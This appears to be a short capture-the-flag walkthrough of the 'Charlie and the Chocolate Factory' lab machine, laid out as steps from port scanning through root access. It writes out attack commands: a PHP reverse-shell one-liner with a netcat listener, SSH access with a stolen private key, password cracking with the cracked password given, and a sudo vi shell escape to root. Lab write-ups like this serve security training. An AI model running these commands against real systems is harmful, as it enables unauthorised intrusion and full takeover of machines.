Charlie and the Chocolate Factory
Open Ports:
nmap $IP
netcat to all prots from 100 - 125
nc $IP 100
nc $IP 113
- found a link in port 113 : http://localhost/key_rev_key
- found a key file in link
- Revers engineering the file
strings key
- Anonymous login
- found an image
get gumroom.jpg
- extract the image
steghide extarct -sf gumroom.jpg
- found b64.txt which has base64 encoded text
decoding the text
- user password shadow file found
- crack the shadow file usig johnny
Port 80
- Enter the username: charlie
Enter the password found after cracking : cn7824
- After login found a bar that executes os commands
- Gaining reverse shell
php -r '$sock=fsockopen("",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
- start listner
nc -lvnp 1234
Now you have the access to the machine
go to /home/charlie
- You will find teleport file which is a id_rsa file(ssh-key)
- copy the contents of the file to host machine
- change the permission of the teleport file in the host machine
chmod 600 teleport ssh -i teleport charlie@ip
Port 22
- cd /home/charlie
cat uesr.txt
- see the permissions you have
sudo -l
- permission to run vi as sudo
sudo vi -c '!/bin/bash'
- now you are root
- go to /root
- Enter the key found after reversing